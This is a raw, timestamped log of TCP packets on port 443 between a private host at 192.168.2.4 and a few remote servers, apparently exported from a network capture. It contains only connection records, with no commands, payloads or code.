                                                                                                                                                                                  Nov 23, 2024 14:47:01.809357882 CET4434977413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:01.809397936 CET49774443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:01.809397936 CET49774443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:01.846978903 CET4434977413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:01.847070932 CET4434977413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:01.847109079 CET49774443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:01.847131968 CET4434977413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:01.847165108 CET49774443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:01.847202063 CET49774443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:01.868678093 CET4434977413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:01.868772984 CET4434977413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:01.868837118 CET49774443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:01.868870020 CET4434977413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:01.868906975 CET49774443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:01.868932962 CET49774443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:01.885411978 CET4434977413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:01.885433912 CET4434977413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:01.885520935 CET49774443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:01.885546923 CET4434977413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:01.885644913 CET49774443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:02.014195919 CET4434977413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:02.014302969 CET4434977413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:02.014308929 CET49774443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:02.014345884 CET4434977413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:02.014398098 CET49774443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:02.014425039 CET49774443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:02.030734062 CET4434977413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:02.030801058 CET4434977413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:02.030821085 CET49774443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:02.030831099 CET4434977413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:02.030879974 CET49774443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:02.030900955 CET49774443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:02.047420979 CET4434977413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:02.047501087 CET4434977413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:02.047506094 CET49774443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:02.047528028 CET4434977413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:02.047578096 CET49774443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:02.047593117 CET49774443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:02.061876059 CET4434977413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:02.061955929 CET4434977413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:02.061964035 CET49774443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:02.062000990 CET4434977413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:02.062037945 CET49774443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:02.062057018 CET49774443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:02.077368021 CET4434977413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:02.077454090 CET4434977413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:02.077462912 CET49774443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:02.077491999 CET4434977413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:02.077537060 CET49774443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:02.077547073 CET49774443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:02.094177008 CET4434977413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:02.094209909 CET4434977413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:02.094379902 CET49774443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:02.094391108 CET4434977413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:02.094449997 CET49774443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:02.100970984 CET4434977413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:02.101057053 CET49774443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:02.101063967 CET4434977413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:02.101087093 CET4434977413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:02.101106882 CET49774443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:02.101139069 CET49774443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:02.112827063 CET49774443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:02.112854004 CET4434977413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:02.112884998 CET49774443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:02.112891912 CET4434977413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:02.194833040 CET49785443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:02.194875956 CET4434978513.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:02.194938898 CET49785443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:02.196230888 CET49786443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:02.196265936 CET4434978613.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:02.196329117 CET49786443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:02.198712111 CET49787443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:02.198736906 CET4434978713.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:02.198788881 CET49787443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:02.199508905 CET49787443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:02.199522018 CET4434978713.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:02.199564934 CET49786443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:02.199579954 CET4434978613.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:02.199603081 CET49785443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:02.199611902 CET4434978513.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:02.200761080 CET49788443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:02.200795889 CET4434978813.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:02.200854063 CET49788443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:02.200957060 CET49789443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:02.200992107 CET4434978913.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:02.201056957 CET49788443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:02.201061964 CET49789443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:02.201071024 CET4434978813.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:02.201282978 CET49789443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:02.201297998 CET4434978913.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:03.926239014 CET4434978513.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:03.928519964 CET4434978713.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:03.929099083 CET49785443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:03.929138899 CET4434978513.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:03.929616928 CET49785443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:03.929624081 CET4434978513.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:03.929882050 CET49787443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:03.929898024 CET4434978713.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:03.930275917 CET49787443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:03.930280924 CET4434978713.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:03.980741978 CET4434978613.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:03.991746902 CET4434978813.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:03.993118048 CET49786443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:03.993156910 CET4434978613.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:03.994009018 CET49786443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:03.994016886 CET4434978613.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:04.001513958 CET49788443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:04.001554966 CET4434978813.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:04.002106905 CET49788443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:04.002114058 CET4434978813.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:04.045049906 CET4434978913.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:04.045646906 CET49789443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:04.045664072 CET4434978913.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:04.046049118 CET49789443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:04.046053886 CET4434978913.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:04.339576960 CET44349756142.250.181.100192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:04.339653969 CET44349756142.250.181.100192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:04.339715004 CET49756443192.168.2.4142.250.181.100
                                                                                                                                                                                  Nov 23, 2024 14:47:04.370863914 CET4434978713.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:04.370891094 CET4434978713.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:04.370975971 CET49787443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:04.370996952 CET4434978713.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:04.371047974 CET49787443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:04.373735905 CET4434978513.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:04.373811007 CET4434978513.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:04.373863935 CET49785443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:04.373877048 CET4434978513.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:04.373958111 CET49785443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:04.373979092 CET4434978513.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:04.374028921 CET49785443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:04.374284029 CET4434978713.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:04.374336958 CET4434978713.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:04.374385118 CET49787443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:04.429177046 CET4434978613.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:04.429294109 CET4434978613.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:04.429351091 CET49786443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:04.441023111 CET4434978813.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:04.441106081 CET4434978813.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:04.441184044 CET49788443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:04.458827019 CET49787443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:04.458847046 CET4434978713.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:04.458861113 CET49787443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:04.458868980 CET4434978713.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:04.460274935 CET49788443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:04.460274935 CET49788443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:04.460311890 CET4434978813.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:04.460338116 CET4434978813.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:04.461114883 CET49785443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:04.461132050 CET4434978513.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:04.461148024 CET49785443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:04.461154938 CET4434978513.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:04.461982965 CET49786443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:04.462002993 CET4434978613.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:04.462037086 CET49786443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:04.462044954 CET4434978613.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:04.506345987 CET4434978913.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:04.506364107 CET4434978913.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:04.506443024 CET49789443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:04.506450891 CET4434978913.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:04.507086039 CET4434978913.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:04.507160902 CET49789443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:04.619908094 CET49801443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:04.619978905 CET4434980113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:04.620100975 CET49801443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:04.862030983 CET49789443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:04.862030983 CET49789443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:04.862049103 CET4434978913.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:04.862057924 CET4434978913.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:04.863352060 CET49801443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:04.863382101 CET4434980113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:04.866655111 CET49803443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:04.866677999 CET4434980313.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:04.866703033 CET49802443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:04.866745949 CET49803443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:04.866780996 CET4434980213.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:04.866859913 CET49802443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:04.866910934 CET49803443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:04.866923094 CET4434980313.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:04.867827892 CET49804443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:04.867885113 CET4434980413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:04.867973089 CET49804443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:04.869262934 CET49802443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:04.869302988 CET4434980213.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:04.869930029 CET49804443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:04.869960070 CET4434980413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:04.872133017 CET49805443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:04.872159004 CET4434980513.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:04.872291088 CET49805443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:04.872431040 CET49805443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:04.872442007 CET4434980513.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:04.983911991 CET49756443192.168.2.4142.250.181.100
                                                                                                                                                                                  Nov 23, 2024 14:47:04.983942986 CET44349756142.250.181.100192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:06.588239908 CET4434980413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:06.588999987 CET49804443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:06.589030981 CET4434980413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:06.589513063 CET49804443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:06.589519978 CET4434980413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:06.652121067 CET4434980213.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:06.652487040 CET49802443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:06.652538061 CET4434980213.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:06.652666092 CET4434980313.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:06.653367043 CET49802443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:06.653381109 CET4434980213.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:06.653587103 CET49803443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:06.653606892 CET4434980313.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:06.654156923 CET49803443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:06.654161930 CET4434980313.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:06.714930058 CET4434980113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:06.715430021 CET49801443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:06.715451956 CET4434980113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:06.715826988 CET49801443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:06.715831041 CET4434980113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:06.718733072 CET4434980513.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:06.719026089 CET49805443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:06.719057083 CET4434980513.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:06.719338894 CET49805443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:06.719343901 CET4434980513.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:07.023286104 CET4434980413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:07.023364067 CET4434980413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:07.023435116 CET49804443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:07.035614967 CET49804443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:07.035646915 CET4434980413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:07.035662889 CET49804443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:07.035671949 CET4434980413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:07.075062037 CET49813443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:07.075123072 CET4434981313.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:07.075299025 CET49813443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:07.076581001 CET49813443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:07.076613903 CET4434981313.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:07.096101046 CET4434980313.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:07.096272945 CET4434980213.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:07.096421003 CET4434980313.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:07.096504927 CET4434980213.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:07.096543074 CET49803443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:07.096574068 CET49802443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:07.097342968 CET49803443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:07.097342968 CET49803443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:07.097367048 CET4434980313.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:07.097377062 CET4434980313.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:07.104681015 CET49802443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:07.104701996 CET4434980213.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:07.104782104 CET49802443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:07.104799032 CET4434980213.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:07.109487057 CET49814443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:07.109544039 CET4434981413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:07.109632015 CET49814443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:07.110333920 CET49815443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:07.110354900 CET4434981513.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:07.110546112 CET49814443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:07.110577106 CET49815443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:07.110580921 CET4434981413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:07.110724926 CET49815443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:07.110739946 CET4434981513.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:07.168438911 CET4434980113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:07.168503046 CET4434980113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:07.168560982 CET49801443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:07.169517994 CET49801443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:07.169529915 CET4434980113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:07.173907042 CET49816443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:07.173942089 CET4434981613.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:07.174046993 CET49816443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:07.174273968 CET4434980513.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:07.174354076 CET4434980513.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:07.174422979 CET49816443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:07.174434900 CET4434981613.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:07.174449921 CET49805443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:07.174853086 CET49805443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:07.174884081 CET4434980513.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:07.174900055 CET49805443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:07.174909115 CET4434980513.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:07.183371067 CET49817443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:07.183410883 CET4434981713.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:07.183495998 CET49817443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:07.184062958 CET49817443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:07.184082031 CET4434981713.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:08.128325939 CET49821443192.168.2.420.12.23.50
                                                                                                                                                                                  Nov 23, 2024 14:47:08.128463030 CET4434982120.12.23.50192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:08.129250050 CET49821443192.168.2.420.12.23.50
                                                                                                                                                                                  Nov 23, 2024 14:47:08.129770041 CET49821443192.168.2.420.12.23.50
                                                                                                                                                                                  Nov 23, 2024 14:47:08.129822969 CET4434982120.12.23.50192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:08.693025112 CET4434981413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:08.694463968 CET49814443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:08.694484949 CET4434981413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:08.695024967 CET49814443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:08.695029974 CET4434981413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:08.945425987 CET4434981613.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:08.946322918 CET4434981313.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:08.947213888 CET49816443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:08.947231054 CET4434981613.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:08.947711945 CET49816443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:08.947715998 CET4434981613.107.246.63192.168.2.4
